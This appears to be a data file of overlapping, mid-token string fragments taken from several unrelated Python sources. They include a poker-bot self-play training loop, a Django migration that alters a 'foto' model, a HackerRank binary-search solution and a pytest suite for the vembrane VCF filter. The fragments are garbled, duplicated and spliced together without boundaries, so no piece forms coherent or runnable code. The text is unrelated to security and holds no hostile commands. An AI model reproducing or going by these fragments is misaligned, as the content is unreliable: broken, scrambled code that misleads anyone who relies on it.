"act, winn, saldo = play_manu_hands(gym, training_model, training_model_rnd_odds, opp_models[j], rnd_odds[j], num_hands=num_hands, what_if_play=what_if_play) elapsed_time =",
"len(all_winnings) < len(all_states): id = len(all_winnings) player_id = all_states[id].player_to_act all_winnings.append(winnings[player_id]) def play_hand(gym, model0,",
"= m1.calculate_action(model0, state, rnd_odds0) else: [action, action_ind], ammount = m1.calculate_action(model1, state, rnd_odds1) is_fake_action",
"0] winn[state.player_to_act] = 0 winn[state.other_player_ind] = state.pot_size print(\"Winnings:\", winn) append_winnings(all_states, all_winnings, winn) if",
"score: \", total_saldo[1], \"per hand\") print(\"\") print(\"Colected \", len(all_states), \" data pairs for",
"5 #opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_00.h5\", \"model_1_lvl_00.h5\", \"model_1_lvl_01.h5\", \"model_1_lvl_02.h5\"], [100, 0, 0, 0])",
"[] all_actions = [] all_winnings = [] hand_saldo = [] while state.status !=",
"print(\"All winings:\", all_winnings) if len(hand_saldo) == 0: hand_saldo = [state.saldo[0], state.saldo[1]] print(\"Taking state",
"m1.create_model_1() training_model.load_weights(file_name) if do_training: print(\"Now training\\n\", file=f) f.flush() for j in range(len(states)): real_epochs",
"winn = [0, 0] winn[state.player_to_act] = 0 winn[state.other_player_ind] = state.pot_size print(\"Winnings:\", winn) append_winnings(all_states,",
"= True do_training = True training_epochs = 30 # Leveling params saldo_limit_for_next_lvl =",
"= time.time() - start_time states.append(st) actions.append(act) winnings.append(winn) #saldos.append(saldo) if saldo[0] < saldo_limit_for_next_lvl: go_to_next_level",
"print(\"\") print(\"Bot 0 score: \", total_saldo[0], \"per hand\") print(\"Bot 1 score: \", total_saldo[1],",
"all_winnings = [] hand_saldo = [] while state.status != \"hand_finished\": if state.player_to_act ==",
"vs\", opp_name[j], file=f) f.flush() start_time = time.time() st, act, winn, saldo = play_manu_hands(gym,",
"= play_manu_hands(gym, training_model, training_model_rnd_odds, opp_models[j], rnd_odds[j], num_hands=num_hands, what_if_play=what_if_play) elapsed_time = time.time() - start_time",
"models, rnd_odds, opp_names gym = load_gym() f = open(\"log.txt\", \"w\") training_model = m1.create_model_1()",
"print(\"Hand saldo at the moment of first fold:\", hand_saldo) # randomize new action",
"str(next_level).zfill(2) + \".h5\" print(\"Went to next level:\", file_name, \"\\n\", file=f) f.flush() training_model.save_weights(file_name) next_level",
"to next level:\", file_name, \"\\n\", file=f) f.flush() training_model.save_weights(file_name) next_level += 1 # Push",
"winnings, saldo = play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play) total_saldo[0] += saldo[0] total_saldo[1]",
"\"epochs in\", round(elapsed_time), \"seconds\", round(elapsed_time / real_epochs, 2), \"seconds per epoch\", file=f) f.flush()",
"is_fake_action) append_winnings(all_states, all_winnings, state.winnings) print(\"All winings:\", all_winnings) if len(hand_saldo) == 0: hand_saldo =",
"time from load_gym import load_gym import action_helpers as ah import dl_model_1 as m1",
"model0, rnd_odds0, model1, rnd_odds1, what_if_play) total_saldo[0] += saldo[0] total_saldo[1] += saldo[1] print(\"Avg saldo",
"all_winnings, hand_saldo def play_manu_hands(gym, model0, rnd_odds0, model1, rnd_odds1, num_hands, what_if_play): all_states = []",
"saldo_limit_for_next_lvl = 200 next_level = 4 max_opp_models = 20 for i in range(num_iters):",
"opp_names gym = load_gym() f = open(\"log.txt\", \"w\") training_model = m1.create_model_1() training_model.load_weights(\"weights0012.h5\") training_model_rnd_odds",
"fold - randomizing action ******\") winn = [0, 0] winn[state.player_to_act] = 0 winn[state.other_player_ind]",
"state.player_to_act, \"wanted to fold - randomizing action ******\") winn = [0, 0] winn[state.player_to_act]",
"[] while state.status != \"hand_finished\": if state.player_to_act == 0: [action, action_ind], ammount =",
"all_actions, all_winnings, total_saldo def load_opp_models(model_paths, rnd_odds): models = [] opp_names = [] for",
"winnings): while len(all_winnings) < len(all_states): id = len(all_winnings) player_id = all_states[id].player_to_act all_winnings.append(winnings[player_id]) def",
"in range(num_hands): print(\"\") print(\"Hand: \", i) states, actions, winnings, saldo = play_hand(gym, model0,",
"= [0, 0] winn[state.player_to_act] = 0 winn[state.other_player_ind] = state.pot_size print(\"Winnings:\", winn) append_winnings(all_states, all_winnings,",
"file=f) print(\"Saldo vs\", opp_name[j], saldo, \"\\n\", file=f) f.flush() if do_training and go_to_next_level: file_name",
"== 0: all_states.append(state) all_actions.append(action_ind) print(\"Calculated action:\", action, ammount) state = gym.act(action, ammount, is_fake_action)",
"training_model_rnd_odds = 5 #opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_00.h5\", \"model_1_lvl_00.h5\", \"model_1_lvl_01.h5\", \"model_1_lvl_02.h5\"], [100, 0,",
"against opp models for j in range(len(opp_models)): print(\"Playing vs\", opp_name[j], file=f) f.flush() start_time",
"# In case of fold we can continue playing... if (action == ah.ACTION_FOLD[0])",
"hand_saldo = [] while state.status != \"hand_finished\": if state.player_to_act == 0: [action, action_ind],",
"for winn in winnings: all_winnings.append(winn) total_saldo[0] /= num_hands total_saldo[1] /= num_hands print(\"\") print(\"Bot",
"elapsed_time / num_hands), \"ms per hand\", file=f) print(\"Saldo vs\", opp_name[j], saldo, \"\\n\", file=f)",
"[] opp_names = [] for i in range(len(model_paths)): opp_model = m1.create_model_1() opp_model.load_weights(model_paths[i]) models.append(opp_model)",
"states = [] actions = [] winnings = [] #saldos = [] go_to_next_level",
"state.stack_size - state.start_stack_size hand_saldo[state.other_player_ind] = -hand_saldo[state.player_to_act] print(\"Hand saldo at the moment of first",
"model1, rnd_odds1, what_if_play): state = gym.startHand() all_states = [] all_actions = [] all_winnings",
"if do_training and go_to_next_level: file_name = \"model_1_lvl_\" + str(next_level).zfill(2) + \".h5\" print(\"Went to",
"round(elapsed_time / real_epochs, 2), \"seconds per epoch\", file=f) f.flush() file_name = \"weights\" +",
"round(elapsed_time), \"seconds\", round(1000 * elapsed_time / num_hands), \"ms per hand\", file=f) print(\"Saldo vs\",",
"print(\"Bot 1 score: \", total_saldo[1], \"per hand\") print(\"\") print(\"Colected \", len(all_states), \" data",
"state.winnings) print(\"All winings:\", all_winnings) if len(hand_saldo) == 0: hand_saldo = [state.saldo[0], state.saldo[1]] print(\"Taking",
"what_if_play): all_states = [] all_actions = [] all_winnings = [] total_saldo = [0,",
"Make new training model. Continue where last one left off training_model = m1.create_model_1()",
"= [] total_saldo = [0, 0] for i in range(num_hands): print(\"\") print(\"Hand: \",",
"state.player_to_act == 0: all_states.append(state) all_actions.append(action_ind) print(\"Calculated action:\", action, ammount) state = gym.act(action, ammount,",
"action, ammount) state = gym.act(action, ammount, is_fake_action) append_winnings(all_states, all_winnings, state.winnings) print(\"All winings:\", all_winnings)",
"(saldos[j][0] < 0): # real_epochs *= 2 start_time = time.time() m1.train_model(training_model, states[j], actions[j],",
"= \"model_1_lvl_\" + str(next_level).zfill(2) + \".h5\" print(\"Went to next level:\", file_name, \"\\n\", file=f)",
"real_epochs *= 2 start_time = time.time() m1.train_model(training_model, states[j], actions[j], winnings[j], batch_size=128, validation_split=0.1, epochs=real_epochs)",
"actions: all_actions.append(act) for winn in winnings: all_winnings.append(winn) total_saldo[0] /= num_hands total_saldo[1] /= num_hands",
"all_winnings, total_saldo def load_opp_models(model_paths, rnd_odds): models = [] opp_names = [] for i",
"2), \"seconds per epoch\", file=f) f.flush() file_name = \"weights\" + str(i).zfill(4) + \".h5\"",
"== 0: [action, action_ind], ammount = m1.calculate_action(model0, state, rnd_odds0) else: [action, action_ind], ammount",
"hand_saldo) # randomize new action and continue playing... [action, action_ind], ammount = ah.randomize_action(state.pot_size,",
"ah.ACTION_FOLD[0]) and what_if_play: print(\"Player:\", state.player_to_act, \"wanted to fold - randomizing action ******\") winn",
"do_training = True training_epochs = 30 # Leveling params saldo_limit_for_next_lvl = 200 next_level",
"i in range(num_iters): print(\"\\nIteration:\", i, \"\\n\", file=f) f.flush() states = [] actions =",
"models for j in range(len(opp_models)): print(\"Playing vs\", opp_name[j], file=f) f.flush() start_time = time.time()",
"case of fold we can continue playing... if (action == ah.ACTION_FOLD[0]) and what_if_play:",
"= True if state.player_to_act == 0: all_states.append(state) all_actions.append(action_ind) print(\"Calculated action:\", action, ammount) state",
"rnd_odds1) is_fake_action = False # In case of fold we can continue playing...",
"[] winnings = [] #saldos = [] go_to_next_level = True # Play against",
"/= num_hands total_saldo[1] /= num_hands print(\"\") print(\"Bot 0 score: \", total_saldo[0], \"per hand\")",
"next_level = 4 max_opp_models = 20 for i in range(num_iters): print(\"\\nIteration:\", i, \"\\n\",",
"actions[j], winnings[j], batch_size=128, validation_split=0.1, epochs=real_epochs) elapsed_time = time.time() - start_time print(\"Trained\", real_epochs, \"epochs",
"all_actions = [] all_winnings = [] hand_saldo = [] while state.status != \"hand_finished\":",
"total_saldo[0] /= num_hands total_saldo[1] /= num_hands print(\"\") print(\"Bot 0 score: \", total_saldo[0], \"per",
"= [] #saldos = [] go_to_next_level = True # Play against opp models",
"models = [] opp_names = [] for i in range(len(model_paths)): opp_model = m1.create_model_1()",
"file=f) f.flush() if do_training and go_to_next_level: file_name = \"model_1_lvl_\" + str(next_level).zfill(2) + \".h5\"",
"rnd_odds.append(0) opp_name.append(file_name) if len(opp_models) > max_opp_models: opp_models.pop(0) rnd_odds.pop(0) opp_name.pop(0) # Make new training",
"in winnings: all_winnings.append(winn) total_saldo[0] /= num_hands total_saldo[1] /= num_hands print(\"\") print(\"Bot 0 score:",
"winn in winnings: all_winnings.append(winn) total_saldo[0] /= num_hands total_saldo[1] /= num_hands print(\"\") print(\"Bot 0",
"play_manu_hands(gym, training_model, training_model_rnd_odds, opp_models[j], rnd_odds[j], num_hands=num_hands, what_if_play=what_if_play) elapsed_time = time.time() - start_time states.append(st)",
"total_saldo[1] += saldo[1] print(\"Avg saldo per hand:\", round(total_saldo[0] / (i + 1), 2),",
"all_winnings.append(winn) total_saldo[0] /= num_hands total_saldo[1] /= num_hands print(\"\") print(\"Bot 0 score: \", total_saldo[0],",
"30 # Leveling params saldo_limit_for_next_lvl = 200 next_level = 4 max_opp_models = 20",
"num_hands=num_hands, what_if_play=what_if_play) elapsed_time = time.time() - start_time states.append(st) actions.append(act) winnings.append(winn) #saldos.append(saldo) if saldo[0]",
"fold we can continue playing... if (action == ah.ACTION_FOLD[0]) and what_if_play: print(\"Player:\", state.player_to_act,",
"- start_time states.append(st) actions.append(act) winnings.append(winn) #saldos.append(saldo) if saldo[0] < saldo_limit_for_next_lvl: go_to_next_level = False",
"100: opp_names.append(\"random\") else: opp_names.append(model_paths[i]) return models, rnd_odds, opp_names gym = load_gym() f =",
"for i in range(num_hands): print(\"\") print(\"Hand: \", i) states, actions, winnings, saldo =",
"state = gym.startHand() all_states = [] all_actions = [] all_winnings = [] hand_saldo",
"in\", round(elapsed_time), \"seconds\", round(elapsed_time / real_epochs, 2), \"seconds per epoch\", file=f) f.flush() file_name",
"elapsed_time = time.time() - start_time states.append(st) actions.append(act) winnings.append(winn) #saldos.append(saldo) if saldo[0] < saldo_limit_for_next_lvl:",
"continue playing... if (action == ah.ACTION_FOLD[0]) and what_if_play: print(\"Player:\", state.player_to_act, \"wanted to fold",
"one left off training_model = m1.create_model_1() training_model.load_weights(file_name) if do_training: print(\"Now training\\n\", file=f) f.flush()",
"+= saldo[1] print(\"Avg saldo per hand:\", round(total_saldo[0] / (i + 1), 2), \",\",",
"state, rnd_odds0) else: [action, action_ind], ammount = m1.calculate_action(model1, state, rnd_odds1) is_fake_action = False",
"[action, action_ind], ammount = ah.randomize_action(state.pot_size, state.ammount_to_call, state.stack_size, never_fold=True) is_fake_action = True if state.player_to_act",
"< 0): # real_epochs *= 2 start_time = time.time() m1.train_model(training_model, states[j], actions[j], winnings[j],",
"all_states, all_actions, all_winnings, total_saldo def load_opp_models(model_paths, rnd_odds): models = [] opp_names = []"
] |
[
"18:49 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class",
"2019-10-27 18:49 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion",
"models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('project', '0003_voting'), ] operations =",
"from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration):",
"= [ ('project', '0003_voting'), ] operations = [ migrations.RemoveField( model_name='foto', name='category', ), migrations.RemoveField(",
"-*- # Generated by Django 1.11 on 2019-10-27 18:49 from __future__ import unicode_literals",
"import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies =",
"Generated by Django 1.11 on 2019-10-27 18:49 from __future__ import unicode_literals from django.db",
"('project', '0003_voting'), ] operations = [ migrations.RemoveField( model_name='foto', name='category', ), migrations.RemoveField( model_name='foto', name='designer',",
"model_name='foto', name='designer', ), migrations.RemoveField( model_name='foto', name='tags', ), migrations.AddField( model_name='foto', name='profiles', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='project.Profile'),",
"# -*- coding: utf-8 -*- # Generated by Django 1.11 on 2019-10-27 18:49",
"django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('project', '0003_voting'),",
"[ ('project', '0003_voting'), ] operations = [ migrations.RemoveField( model_name='foto', name='category', ), migrations.RemoveField( model_name='foto',",
"import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('project', '0003_voting'), ]",
"unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [",
"# Generated by Django 1.11 on 2019-10-27 18:49 from __future__ import unicode_literals from",
"model_name='foto', name='category', ), migrations.RemoveField( model_name='foto', name='designer', ), migrations.RemoveField( model_name='foto', name='tags', ), migrations.AddField( model_name='foto',",
"__future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies",
"[ migrations.RemoveField( model_name='foto', name='category', ), migrations.RemoveField( model_name='foto', name='designer', ), migrations.RemoveField( model_name='foto', name='tags', ),",
"django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('project', '0003_voting'), ] operations = [ migrations.RemoveField(",
"] operations = [ migrations.RemoveField( model_name='foto', name='category', ), migrations.RemoveField( model_name='foto', name='designer', ), migrations.RemoveField(",
"name='designer', ), migrations.RemoveField( model_name='foto', name='tags', ), migrations.AddField( model_name='foto', name='profiles', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='project.Profile'), ),",
"migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('project', '0003_voting'), ] operations",
"), migrations.RemoveField( model_name='foto', name='designer', ), migrations.RemoveField( model_name='foto', name='tags', ), migrations.AddField( model_name='foto', name='profiles', field=models.ForeignKey(null=True,",
"Django 1.11 on 2019-10-27 18:49 from __future__ import unicode_literals from django.db import migrations,",
"import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('project', '0003_voting'), ] operations = [",
"migrations.RemoveField( model_name='foto', name='category', ), migrations.RemoveField( model_name='foto', name='designer', ), migrations.RemoveField( model_name='foto', name='tags', ), migrations.AddField(",
"from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('project',",
"coding: utf-8 -*- # Generated by Django 1.11 on 2019-10-27 18:49 from __future__",
"'0003_voting'), ] operations = [ migrations.RemoveField( model_name='foto', name='category', ), migrations.RemoveField( model_name='foto', name='designer', ),",
"Migration(migrations.Migration): dependencies = [ ('project', '0003_voting'), ] operations = [ migrations.RemoveField( model_name='foto', name='category',",
"class Migration(migrations.Migration): dependencies = [ ('project', '0003_voting'), ] operations = [ migrations.RemoveField( model_name='foto',",
"on 2019-10-27 18:49 from __future__ import unicode_literals from django.db import migrations, models import",
"migrations.RemoveField( model_name='foto', name='designer', ), migrations.RemoveField( model_name='foto', name='tags', ), migrations.AddField( model_name='foto', name='profiles', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE,",
"by Django 1.11 on 2019-10-27 18:49 from __future__ import unicode_literals from django.db import",
"name='category', ), migrations.RemoveField( model_name='foto', name='designer', ), migrations.RemoveField( model_name='foto', name='tags', ), migrations.AddField( model_name='foto', name='profiles',",
"1.11 on 2019-10-27 18:49 from __future__ import unicode_literals from django.db import migrations, models",
"utf-8 -*- # Generated by Django 1.11 on 2019-10-27 18:49 from __future__ import",
"dependencies = [ ('project', '0003_voting'), ] operations = [ migrations.RemoveField( model_name='foto', name='category', ),",
"-*- coding: utf-8 -*- # Generated by Django 1.11 on 2019-10-27 18:49 from",
"operations = [ migrations.RemoveField( model_name='foto', name='category', ), migrations.RemoveField( model_name='foto', name='designer', ), migrations.RemoveField( model_name='foto',",
"), migrations.RemoveField( model_name='foto', name='tags', ), migrations.AddField( model_name='foto', name='profiles', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='project.Profile'), ), ]",
"= [ migrations.RemoveField( model_name='foto', name='category', ), migrations.RemoveField( model_name='foto', name='designer', ), migrations.RemoveField( model_name='foto', name='tags',"
] |
[
"time / c: right = n else: left = n return left assert",
"2000000000 left, right = 1, 2000000000 while not right - left < 1e-9:",
"while not right - left < 1e-9: n = (left + right) /",
"(left + right) / 2 if n * math.log(n, 2) >= time /",
"abs(how_many(2, 16) - 4) < 1e-9 assert abs(how_many(37, 12392342) - 23104.999312341137) < 1e-9",
"n return left assert abs(how_many(1, 8) - 4) < 1e-9 assert abs(how_many(2, 16)",
"if n * math.log(n, 2) >= time / c: right = n else:",
"2000000000 while not right - left < 1e-9: n = (left + right)",
"= 1, 2000000000 while not right - left < 1e-9: n = (left",
"abs(how_many(37, 12392342) - 23104.999312341137) < 1e-9 assert abs(how_many(1, 2000000000) - 7.637495090348122e7) < 1e-9",
"< 1e-9 assert abs(how_many(37, 12392342) - 23104.999312341137) < 1e-9 assert abs(how_many(1, 2000000000) -",
"1e-9: n = (left + right) / 2 if n * math.log(n, 2)",
"n = (left + right) / 2 if n * math.log(n, 2) >=",
"right - left < 1e-9: n = (left + right) / 2 if",
"n else: left = n return left assert abs(how_many(1, 8) - 4) <",
"assert 1 <= time <= 2000000000 left, right = 1, 2000000000 while not",
"16) - 4) < 1e-9 assert abs(how_many(37, 12392342) - 23104.999312341137) < 1e-9 assert",
"- 4) < 1e-9 assert abs(how_many(2, 16) - 4) < 1e-9 assert abs(how_many(37,",
"100 assert 1 <= time <= 2000000000 left, right = 1, 2000000000 while",
"left < 1e-9: n = (left + right) / 2 if n *",
"math def how_many(c, time): assert 1 <= c <= 100 assert 1 <=",
"2 if n * math.log(n, 2) >= time / c: right = n",
"right = n else: left = n return left assert abs(how_many(1, 8) -",
"1 <= time <= 2000000000 left, right = 1, 2000000000 while not right",
"c: right = n else: left = n return left assert abs(how_many(1, 8)",
"right) / 2 if n * math.log(n, 2) >= time / c: right",
"< 1e-9 assert abs(how_many(2, 16) - 4) < 1e-9 assert abs(how_many(37, 12392342) -",
"assert abs(how_many(2, 16) - 4) < 1e-9 assert abs(how_many(37, 12392342) - 23104.999312341137) <",
"- 4) < 1e-9 assert abs(how_many(37, 12392342) - 23104.999312341137) < 1e-9 assert abs(how_many(1,",
"import math def how_many(c, time): assert 1 <= c <= 100 assert 1",
"1e-9 assert abs(how_many(2, 16) - 4) < 1e-9 assert abs(how_many(37, 12392342) - 23104.999312341137)",
"#!/usr/bin/env python import math def how_many(c, time): assert 1 <= c <= 100",
"+ right) / 2 if n * math.log(n, 2) >= time / c:",
"abs(how_many(1, 8) - 4) < 1e-9 assert abs(how_many(2, 16) - 4) < 1e-9",
"4) < 1e-9 assert abs(how_many(37, 12392342) - 23104.999312341137) < 1e-9 assert abs(how_many(1, 2000000000)",
"return left assert abs(how_many(1, 8) - 4) < 1e-9 assert abs(how_many(2, 16) -",
"time <= 2000000000 left, right = 1, 2000000000 while not right - left",
"n * math.log(n, 2) >= time / c: right = n else: left",
"<reponame>0x8b/HackerRank<gh_stars>1-10 #!/usr/bin/env python import math def how_many(c, time): assert 1 <= c <=",
"2) >= time / c: right = n else: left = n return",
"not right - left < 1e-9: n = (left + right) / 2",
"1e-9 assert abs(how_many(37, 12392342) - 23104.999312341137) < 1e-9 assert abs(how_many(1, 2000000000) - 7.637495090348122e7)",
"8) - 4) < 1e-9 assert abs(how_many(2, 16) - 4) < 1e-9 assert",
"python import math def how_many(c, time): assert 1 <= c <= 100 assert",
"assert 1 <= c <= 100 assert 1 <= time <= 2000000000 left,",
"<= 2000000000 left, right = 1, 2000000000 while not right - left <",
"time): assert 1 <= c <= 100 assert 1 <= time <= 2000000000",
"/ 2 if n * math.log(n, 2) >= time / c: right =",
"how_many(c, time): assert 1 <= c <= 100 assert 1 <= time <=",
"= n else: left = n return left assert abs(how_many(1, 8) - 4)",
"math.log(n, 2) >= time / c: right = n else: left = n",
"4) < 1e-9 assert abs(how_many(2, 16) - 4) < 1e-9 assert abs(how_many(37, 12392342)",
"c <= 100 assert 1 <= time <= 2000000000 left, right = 1,",
"<= c <= 100 assert 1 <= time <= 2000000000 left, right =",
"1, 2000000000 while not right - left < 1e-9: n = (left +",
"/ c: right = n else: left = n return left assert abs(how_many(1,",
"right = 1, 2000000000 while not right - left < 1e-9: n =",
"<= time <= 2000000000 left, right = 1, 2000000000 while not right -",
"1 <= c <= 100 assert 1 <= time <= 2000000000 left, right",
"left, right = 1, 2000000000 while not right - left < 1e-9: n",
"def how_many(c, time): assert 1 <= c <= 100 assert 1 <= time",
"<= 100 assert 1 <= time <= 2000000000 left, right = 1, 2000000000",
"< 1e-9: n = (left + right) / 2 if n * math.log(n,",
"else: left = n return left assert abs(how_many(1, 8) - 4) < 1e-9",
"left = n return left assert abs(how_many(1, 8) - 4) < 1e-9 assert",
"assert abs(how_many(37, 12392342) - 23104.999312341137) < 1e-9 assert abs(how_many(1, 2000000000) - 7.637495090348122e7) <",
"* math.log(n, 2) >= time / c: right = n else: left =",
"= n return left assert abs(how_many(1, 8) - 4) < 1e-9 assert abs(how_many(2,",
"left assert abs(how_many(1, 8) - 4) < 1e-9 assert abs(how_many(2, 16) - 4)",
"- left < 1e-9: n = (left + right) / 2 if n",
"assert abs(how_many(1, 8) - 4) < 1e-9 assert abs(how_many(2, 16) - 4) <",
">= time / c: right = n else: left = n return left",
"= (left + right) / 2 if n * math.log(n, 2) >= time"
] |
[
") else: expected = list(VariantFile(path.joinpath(\"expected.vcf\"))) result = list( filter_vcf( vcf, config.get(\"filter_expression\"), config.get(\"ann_key\", \"ANN\"),",
") ) else: expected = list(VariantFile(path.joinpath(\"expected.vcf\"))) result = list( filter_vcf( vcf, config.get(\"filter_expression\"), config.get(\"ann_key\",",
"from pathlib import Path import os from pysam import VariantFile import pytest import",
"filter expression here # until we change from calling filter_vcf # to actually",
"pytest import yaml from vembrane import errors from vembrane import __version__, filter_vcf CASES",
") def test_filter(testcase): path = CASES.joinpath(testcase) with open(path.joinpath(\"config.yaml\")) as config_fp: config = yaml.load(config_fp,",
"to actually invoking vembrane.main check_filter_expression(config.get(\"filter_expression\")) list( filter_vcf( vcf, config.get(\"filter_expression\"), config.get(\"ann_key\", \"ANN\"), config.get(\"keep_unmatched\", False),",
"we change from calling filter_vcf # to actually invoking vembrane.main check_filter_expression(config.get(\"filter_expression\")) list( filter_vcf(",
"= list(VariantFile(path.joinpath(\"expected.vcf\"))) result = list( filter_vcf( vcf, config.get(\"filter_expression\"), config.get(\"ann_key\", \"ANN\"), config.get(\"keep_unmatched\", False), )",
"list(VariantFile(path.joinpath(\"expected.vcf\"))) result = list( filter_vcf( vcf, config.get(\"filter_expression\"), config.get(\"ann_key\", \"ANN\"), config.get(\"keep_unmatched\", False), ) )",
"with pytest.raises(exception): # FIXME we have to explicitly check the filter expression here",
"== \"0.1.0\" @pytest.mark.parametrize( \"testcase\", [d for d in os.listdir(CASES) if not d.startswith(\".\")] )",
"vembrane import errors from vembrane import __version__, filter_vcf CASES = Path(__file__).parent.joinpath(\"testcases\") def test_version():",
"vcf = VariantFile(path.joinpath(\"test.vcf\")) if \"raises\" in config: exception = getattr(errors, config[\"raises\"]) from vembrane",
"def test_filter(testcase): path = CASES.joinpath(testcase) with open(path.joinpath(\"config.yaml\")) as config_fp: config = yaml.load(config_fp, Loader=yaml.FullLoader)",
"check_filter_expression with pytest.raises(exception): # FIXME we have to explicitly check the filter expression",
"change from calling filter_vcf # to actually invoking vembrane.main check_filter_expression(config.get(\"filter_expression\")) list( filter_vcf( vcf,",
"from vembrane import errors from vembrane import __version__, filter_vcf CASES = Path(__file__).parent.joinpath(\"testcases\") def",
"result = list( filter_vcf( vcf, config.get(\"filter_expression\"), config.get(\"ann_key\", \"ANN\"), config.get(\"keep_unmatched\", False), ) ) assert",
"VariantFile import pytest import yaml from vembrane import errors from vembrane import __version__,",
"import VariantFile import pytest import yaml from vembrane import errors from vembrane import",
"Path(__file__).parent.joinpath(\"testcases\") def test_version(): assert __version__ == \"0.1.0\" @pytest.mark.parametrize( \"testcase\", [d for d in",
"vcf, config.get(\"filter_expression\"), config.get(\"ann_key\", \"ANN\"), config.get(\"keep_unmatched\", False), ) ) else: expected = list(VariantFile(path.joinpath(\"expected.vcf\"))) result",
"config.get(\"ann_key\", \"ANN\"), config.get(\"keep_unmatched\", False), ) ) else: expected = list(VariantFile(path.joinpath(\"expected.vcf\"))) result = list(",
"import Path import os from pysam import VariantFile import pytest import yaml from",
"config.get(\"keep_unmatched\", False), ) ) else: expected = list(VariantFile(path.joinpath(\"expected.vcf\"))) result = list( filter_vcf( vcf,",
"= Path(__file__).parent.joinpath(\"testcases\") def test_version(): assert __version__ == \"0.1.0\" @pytest.mark.parametrize( \"testcase\", [d for d",
"list( filter_vcf( vcf, config.get(\"filter_expression\"), config.get(\"ann_key\", \"ANN\"), config.get(\"keep_unmatched\", False), ) ) assert result ==",
"CASES.joinpath(testcase) with open(path.joinpath(\"config.yaml\")) as config_fp: config = yaml.load(config_fp, Loader=yaml.FullLoader) vcf = VariantFile(path.joinpath(\"test.vcf\")) if",
"from pysam import VariantFile import pytest import yaml from vembrane import errors from",
"in os.listdir(CASES) if not d.startswith(\".\")] ) def test_filter(testcase): path = CASES.joinpath(testcase) with open(path.joinpath(\"config.yaml\"))",
"@pytest.mark.parametrize( \"testcase\", [d for d in os.listdir(CASES) if not d.startswith(\".\")] ) def test_filter(testcase):",
"not d.startswith(\".\")] ) def test_filter(testcase): path = CASES.joinpath(testcase) with open(path.joinpath(\"config.yaml\")) as config_fp: config",
"vembrane.main check_filter_expression(config.get(\"filter_expression\")) list( filter_vcf( vcf, config.get(\"filter_expression\"), config.get(\"ann_key\", \"ANN\"), config.get(\"keep_unmatched\", False), ) ) else:",
"yaml from vembrane import errors from vembrane import __version__, filter_vcf CASES = Path(__file__).parent.joinpath(\"testcases\")",
"to explicitly check the filter expression here # until we change from calling",
"config.get(\"filter_expression\"), config.get(\"ann_key\", \"ANN\"), config.get(\"keep_unmatched\", False), ) ) else: expected = list(VariantFile(path.joinpath(\"expected.vcf\"))) result =",
"# until we change from calling filter_vcf # to actually invoking vembrane.main check_filter_expression(config.get(\"filter_expression\"))",
"= VariantFile(path.joinpath(\"test.vcf\")) if \"raises\" in config: exception = getattr(errors, config[\"raises\"]) from vembrane import",
"config[\"raises\"]) from vembrane import check_filter_expression with pytest.raises(exception): # FIXME we have to explicitly",
"yaml.load(config_fp, Loader=yaml.FullLoader) vcf = VariantFile(path.joinpath(\"test.vcf\")) if \"raises\" in config: exception = getattr(errors, config[\"raises\"])",
"# FIXME we have to explicitly check the filter expression here # until",
"vembrane import check_filter_expression with pytest.raises(exception): # FIXME we have to explicitly check the",
"from vembrane import __version__, filter_vcf CASES = Path(__file__).parent.joinpath(\"testcases\") def test_version(): assert __version__ ==",
"filter_vcf CASES = Path(__file__).parent.joinpath(\"testcases\") def test_version(): assert __version__ == \"0.1.0\" @pytest.mark.parametrize( \"testcase\", [d",
"for d in os.listdir(CASES) if not d.startswith(\".\")] ) def test_filter(testcase): path = CASES.joinpath(testcase)",
"we have to explicitly check the filter expression here # until we change",
"errors from vembrane import __version__, filter_vcf CASES = Path(__file__).parent.joinpath(\"testcases\") def test_version(): assert __version__",
"filter_vcf # to actually invoking vembrane.main check_filter_expression(config.get(\"filter_expression\")) list( filter_vcf( vcf, config.get(\"filter_expression\"), config.get(\"ann_key\", \"ANN\"),",
"Loader=yaml.FullLoader) vcf = VariantFile(path.joinpath(\"test.vcf\")) if \"raises\" in config: exception = getattr(errors, config[\"raises\"]) from",
"explicitly check the filter expression here # until we change from calling filter_vcf",
"getattr(errors, config[\"raises\"]) from vembrane import check_filter_expression with pytest.raises(exception): # FIXME we have to",
"test_filter(testcase): path = CASES.joinpath(testcase) with open(path.joinpath(\"config.yaml\")) as config_fp: config = yaml.load(config_fp, Loader=yaml.FullLoader) vcf",
"filter_vcf( vcf, config.get(\"filter_expression\"), config.get(\"ann_key\", \"ANN\"), config.get(\"keep_unmatched\", False), ) ) else: expected = list(VariantFile(path.joinpath(\"expected.vcf\")))",
"vembrane import __version__, filter_vcf CASES = Path(__file__).parent.joinpath(\"testcases\") def test_version(): assert __version__ == \"0.1.0\"",
"list( filter_vcf( vcf, config.get(\"filter_expression\"), config.get(\"ann_key\", \"ANN\"), config.get(\"keep_unmatched\", False), ) ) else: expected =",
"= getattr(errors, config[\"raises\"]) from vembrane import check_filter_expression with pytest.raises(exception): # FIXME we have",
"check the filter expression here # until we change from calling filter_vcf #",
"= list( filter_vcf( vcf, config.get(\"filter_expression\"), config.get(\"ann_key\", \"ANN\"), config.get(\"keep_unmatched\", False), ) ) assert result",
"config = yaml.load(config_fp, Loader=yaml.FullLoader) vcf = VariantFile(path.joinpath(\"test.vcf\")) if \"raises\" in config: exception =",
